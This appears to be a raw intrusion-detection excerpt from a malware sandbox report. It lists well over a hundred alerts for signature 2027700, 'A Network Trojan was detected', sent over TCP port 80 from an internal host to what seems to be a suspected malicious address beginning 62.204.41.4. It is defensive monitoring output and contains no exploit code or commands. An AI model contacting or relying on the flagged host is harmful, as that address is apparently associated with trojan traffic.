                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449950802027700 02/08/23-17:38:38.867192
                            SID:2027700
                            Source Port:49950
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449867802027700 02/08/23-17:38:16.999762
                            SID:2027700
                            Source Port:49867
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449956802027700 02/08/23-17:38:40.308350
                            SID:2027700
                            Source Port:49956
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449778802027700 02/08/23-17:37:46.936137
                            SID:2027700
                            Source Port:49778
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450045802027700 02/08/23-17:39:07.221259
                            SID:2027700
                            Source Port:50045
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450116802027700 02/08/23-17:39:24.518582
                            SID:2027700
                            Source Port:50116
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450312802027700 02/08/23-17:40:15.535341
                            SID:2027700
                            Source Port:50312
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450134802027700 02/08/23-17:39:29.223273
                            SID:2027700
                            Source Port:50134
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450027802027700 02/08/23-17:39:02.823442
                            SID:2027700
                            Source Port:50027
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449922802027700 02/08/23-17:38:30.286333
                            SID:2027700
                            Source Port:49922
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449928802027700 02/08/23-17:38:32.721034
                            SID:2027700
                            Source Port:49928
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449833802027700 02/08/23-17:38:02.749209
                            SID:2027700
                            Source Port:49833
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450100802027700 02/08/23-17:39:20.589445
                            SID:2027700
                            Source Port:50100
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449989802027700 02/08/23-17:38:53.655632
                            SID:2027700
                            Source Port:49989
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449744802027700 02/08/23-17:37:38.778108
                            SID:2027700
                            Source Port:49744
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450144802027700 02/08/23-17:39:31.611275
                            SID:2027700
                            Source Port:50144
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449810802027700 02/08/23-17:37:56.966034
                            SID:2027700
                            Source Port:49810
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449721802027700 02/08/23-17:37:31.055128
                            SID:2027700
                            Source Port:49721
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450233802027700 02/08/23-17:39:55.389175
                            SID:2027700
                            Source Port:50233
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449782802027700 02/08/23-17:37:47.887596
                            SID:2027700
                            Source Port:49782
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450239802027700 02/08/23-17:39:56.854078
                            SID:2027700
                            Source Port:50239
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449871802027700 02/08/23-17:38:17.959791
                            SID:2027700
                            Source Port:49871
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450274802027700 02/08/23-17:40:05.455951
                            SID:2027700
                            Source Port:50274
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450251802027700 02/08/23-17:39:59.807891
                            SID:2027700
                            Source Port:50251
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449839802027700 02/08/23-17:38:07.247675
                            SID:2027700
                            Source Port:49839
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449960802027700 02/08/23-17:38:41.382110
                            SID:2027700
                            Source Port:49960
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449709802027700 02/08/23-17:37:27.822243
                            SID:2027700
                            Source Port:49709
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450185802027700 02/08/23-17:39:43.888646
                            SID:2027700
                            Source Port:50185
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450328802027700 02/08/23-17:40:20.835288
                            SID:2027700
                            Source Port:50328
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450055802027700 02/08/23-17:39:09.713048
                            SID:2027700
                            Source Port:50055
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450096802027700 02/08/23-17:39:19.609784
                            SID:2027700
                            Source Port:50096
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450162802027700 02/08/23-17:39:35.950587
                            SID:2027700
                            Source Port:50162
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449805802027700 02/08/23-17:37:55.775945
                            SID:2027700
                            Source Port:49805
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450073802027700 02/08/23-17:39:14.025211
                            SID:2027700
                            Source Port:50073
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450335802027700 02/08/23-17:40:22.600566
                            SID:2027700
                            Source Port:50335
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450205802027700 02/08/23-17:39:48.611499
                            SID:2027700
                            Source Port:50205
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449912802027700 02/08/23-17:38:27.898909
                            SID:2027700
                            Source Port:49912
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449823802027700 02/08/23-17:38:00.063010
                            SID:2027700
                            Source Port:49823
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449994802027700 02/08/23-17:38:54.852514
                            SID:2027700
                            Source Port:49994
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449716802027700 02/08/23-17:37:29.564268
                            SID:2027700
                            Source Port:49716
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449731802027700 02/08/23-17:37:35.554583
                            SID:2027700
                            Source Port:49731
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449734802027700 02/08/23-17:37:36.292013
                            SID:2027700
                            Source Port:49734
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450004802027700 02/08/23-17:38:57.228666
                            SID:2027700
                            Source Port:50004
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450001802027700 02/08/23-17:38:56.508014
                            SID:2027700
                            Source Port:50001
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449991802027700 02/08/23-17:38:54.132077
                            SID:2027700
                            Source Port:49991
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450261802027700 02/08/23-17:40:02.232461
                            SID:2027700
                            Source Port:50261
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450172802027700 02/08/23-17:39:38.433749
                            SID:2027700
                            Source Port:50172
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450175802027700 02/08/23-17:39:39.452531
                            SID:2027700
                            Source Port:50175
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450338802027700 02/08/23-17:40:23.333402
                            SID:2027700
                            Source Port:50338
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450264802027700 02/08/23-17:40:02.955746
                            SID:2027700
                            Source Port:50264
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450249802027700 02/08/23-17:39:59.294790
                            SID:2027700
                            Source Port:50249
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450086802027700 02/08/23-17:39:17.186333
                            SID:2027700
                            Source Port:50086
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449706802027700 02/08/23-17:37:27.103524
                            SID:2027700
                            Source Port:49706
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450322802027700 02/08/23-17:40:19.378355
                            SID:2027700
                            Source Port:50322
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449963802027700 02/08/23-17:38:45.131886
                            SID:2027700
                            Source Port:49963
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449966802027700 02/08/23-17:38:45.850942
                            SID:2027700
                            Source Port:49966
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449703802027700 02/08/23-17:37:26.386152
                            SID:2027700
                            Source Port:49703
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449877802027700 02/08/23-17:38:19.428227
                            SID:2027700
                            Source Port:49877
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449874802027700 02/08/23-17:38:18.694725
                            SID:2027700
                            Source Port:49874
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450147802027700 02/08/23-17:39:32.357168
                            SID:2027700
                            Source Port:50147
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450017802027700 02/08/23-17:39:00.402673
                            SID:2027700
                            Source Port:50017
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449788802027700 02/08/23-17:37:49.340408
                            SID:2027700
                            Source Port:49788
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449747802027700 02/08/23-17:37:39.514163
                            SID:2027700
                            Source Port:49747
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450188802027700 02/08/23-17:39:44.592465
                            SID:2027700
                            Source Port:50188
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450325802027700 02/08/23-17:40:20.110521
                            SID:2027700
                            Source Port:50325
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449699802027700 02/08/23-17:37:25.386825
                            SID:2027700
                            Source Port:49699
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450058802027700 02/08/23-17:39:10.419596
                            SID:2027700
                            Source Port:50058
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450236802027700 02/08/23-17:39:56.097184
                            SID:2027700
                            Source Port:50236
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450106802027700 02/08/23-17:39:22.067217
                            SID:2027700
                            Source Port:50106
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450277802027700 02/08/23-17:40:06.202209
                            SID:2027700
                            Source Port:50277
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449938802027700 02/08/23-17:38:35.977194
                            SID:2027700
                            Source Port:49938
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450083802027700 02/08/23-17:39:16.450190
                            SID:2027700
                            Source Port:50083
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449808802027700 02/08/23-17:37:56.496601
                            SID:2027700
                            Source Port:49808
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449719802027700 02/08/23-17:37:30.308623
                            SID:2027700
                            Source Port:49719
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450099802027700 02/08/23-17:39:20.353141
                            SID:2027700
                            Source Port:50099
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449979802027700 02/08/23-17:38:49.239264
                            SID:2027700
                            Source Port:49979
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449849802027700 02/08/23-17:38:10.042740
                            SID:2027700
                            Source Port:49849
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449820802027700 02/08/23-17:37:59.355921
                            SID:2027700
                            Source Port:49820
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449772802027700 02/08/23-17:37:45.513154
                            SID:2027700
                            Source Port:49772
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449751802027700 02/08/23-17:37:40.464030
                            SID:2027700
                            Source Port:49751
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449879802027700 02/08/23-17:38:19.911856
                            SID:2027700
                            Source Port:49879
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450051802027700 02/08/23-17:39:08.654162
                            SID:2027700
                            Source Port:50051
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450208802027700 02/08/23-17:39:49.326377
                            SID:2027700
                            Source Port:50208
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450306802027700 02/08/23-17:40:13.234357
                            SID:2027700
                            Source Port:50306
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450244802027700 02/08/23-17:39:58.067517
                            SID:2027700
                            Source Port:50244
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449723802027700 02/08/23-17:37:31.619066
                            SID:2027700
                            Source Port:49723
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449821802027700 02/08/23-17:37:59.589817
                            SID:2027700
                            Source Port:49821
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449977802027700 02/08/23-17:38:48.476008
                            SID:2027700
                            Source Port:49977
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450146802027700 02/08/23-17:39:32.113157
                            SID:2027700
                            Source Port:50146
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450048802027700 02/08/23-17:39:07.945990
                            SID:2027700
                            Source Port:50048
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450339802027700 02/08/23-17:40:23.560898
                            SID:2027700
                            Source Port:50339
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449818802027700 02/08/23-17:37:58.886130
                            SID:2027700
                            Source Port:49818
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449916802027700 02/08/23-17:38:28.865859
                            SID:2027700
                            Source Port:49916
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449972802027700 02/08/23-17:38:47.288532
                            SID:2027700
                            Source Port:49972
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450043802027700 02/08/23-17:39:06.727733
                            SID:2027700
                            Source Port:50043
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449756802027700 02/08/23-17:37:41.670965
                            SID:2027700
                            Source Port:49756
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449969802027700 02/08/23-17:38:46.576219
                            SID:2027700
                            Source Port:49969
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450084802027700 02/08/23-17:39:16.684237
                            SID:2027700
                            Source Port:50084
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450216802027700 02/08/23-17:39:51.285755
                            SID:2027700
                            Source Port:50216
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450297802027700 02/08/23-17:40:11.003850
                            SID:2027700
                            Source Port:50297
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449715802027700 02/08/23-17:37:29.307544
                            SID:2027700
                            Source Port:49715
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449911802027700 02/08/23-17:38:27.650449
                            SID:2027700
                            Source Port:49911
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449952802027700 02/08/23-17:38:39.350317
                            SID:2027700
                            Source Port:49952
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450138802027700 02/08/23-17:39:30.185255
                            SID:2027700
                            Source Port:50138
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450121802027700 02/08/23-17:39:26.010780
                            SID:2027700
                            Source Port:50121
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450179802027700 02/08/23-17:39:41.189675
                            SID:2027700
                            Source Port:50179
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450334802027700 02/08/23-17:40:22.362338
                            SID:2027700
                            Source Port:50334
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449882802027700 02/08/23-17:38:20.650208
                            SID:2027700
                            Source Port:49882
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450269802027700 02/08/23-17:40:04.215307
                            SID:2027700
                            Source Port:50269
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450015802027700 02/08/23-17:38:59.919529
                            SID:2027700
                            Source Port:50015
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450174802027700 02/08/23-17:39:38.936331
                            SID:2027700
                            Source Port:50174
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449841802027700 02/08/23-17:38:07.721676
                            SID:2027700
                            Source Port:49841
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450211802027700 02/08/23-17:39:50.075216
                            SID:2027700
                            Source Port:50211
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450056802027700 02/08/23-17:39:09.948765
                            SID:2027700
                            Source Port:50056
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449887802027700 02/08/23-17:38:21.867507
                            SID:2027700
                            Source Port:49887
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449846802027700 02/08/23-17:38:09.124319
                            SID:2027700
                            Source Port:49846
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449924802027700 02/08/23-17:38:30.980933
                            SID:2027700
                            Source Port:49924
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450252802027700 02/08/23-17:40:00.048499
                            SID:2027700
                            Source Port:50252
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449792802027700 02/08/23-17:37:50.312286
                            SID:2027700
                            Source Port:49792
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449890802027700 02/08/23-17:38:22.601346
                            SID:2027700
                            Source Port:49890
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450154802027700 02/08/23-17:39:34.013057
                            SID:2027700
                            Source Port:50154
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449826802027700 02/08/23-17:38:00.765609
                            SID:2027700
                            Source Port:49826
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450105802027700 02/08/23-17:39:21.799161
                            SID:2027700
                            Source Port:50105
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449997802027700 02/08/23-17:38:55.560103
                            SID:2027700
                            Source Port:49997
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450007802027700 02/08/23-17:38:57.964843
                            SID:2027700
                            Source Port:50007
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449743802027700 02/08/23-17:37:38.542908
                            SID:2027700
                            Source Port:49743
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450068802027700 02/08/23-17:39:12.823951
                            SID:2027700
                            Source Port:50068
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450089802027700 02/08/23-17:39:17.910351
                            SID:2027700
                            Source Port:50089
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450292802027700 02/08/23-17:40:09.795778
                            SID:2027700
                            Source Port:50292
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450187802027700 02/08/23-17:39:44.356708
                            SID:2027700
                            Source Port:50187
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450126802027700 02/08/23-17:39:27.231066
                            SID:2027700
                            Source Port:50126
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450224802027700 02/08/23-17:39:53.250127
                            SID:2027700
                            Source Port:50224
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449771802027700 02/08/23-17:37:45.279320
                            SID:2027700
                            Source Port:49771
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450182802027700 02/08/23-17:39:43.165436
                            SID:2027700
                            Source Port:50182
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449776802027700 02/08/23-17:37:46.462656
                            SID:2027700
                            Source Port:49776
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449859802027700 02/08/23-17:38:14.384506
                            SID:2027700
                            Source Port:49859
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449813802027700 02/08/23-17:37:57.670732
                            SID:2027700
                            Source Port:49813
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450118802027700 02/08/23-17:39:24.995857
                            SID:2027700
                            Source Port:50118
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450141802027700 02/08/23-17:39:30.904821
                            SID:2027700
                            Source Port:50141
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449862802027700 02/08/23-17:38:15.775839
                            SID:2027700
                            Source Port:49862
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449854802027700 02/08/23-17:38:11.554320
                            SID:2027700
                            Source Port:49854
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449992802027700 02/08/23-17:38:54.369069
                            SID:2027700
                            Source Port:49992
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450190802027700 02/08/23-17:39:45.059725
                            SID:2027700
                            Source Port:50190
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449932802027700 02/08/23-17:38:34.522912
                            SID:2027700
                            Source Port:49932
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450260802027700 02/08/23-17:40:01.971811
                            SID:2027700
                            Source Port:50260
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450326802027700 02/08/23-17:40:20.344533
                            SID:2027700
                            Source Port:50326
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450035802027700 02/08/23-17:39:04.790432
                            SID:2027700
                            Source Port:50035
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450076802027700 02/08/23-17:39:14.728959
                            SID:2027700
                            Source Port:50076
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450289802027700 02/08/23-17:40:09.090062
                            SID:2027700
                            Source Port:50289
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449784802027700 02/08/23-17:37:48.372470
                            SID:2027700
                            Source Port:49784
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450159802027700 02/08/23-17:39:35.215447
                            SID:2027700
                            Source Port:50159
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
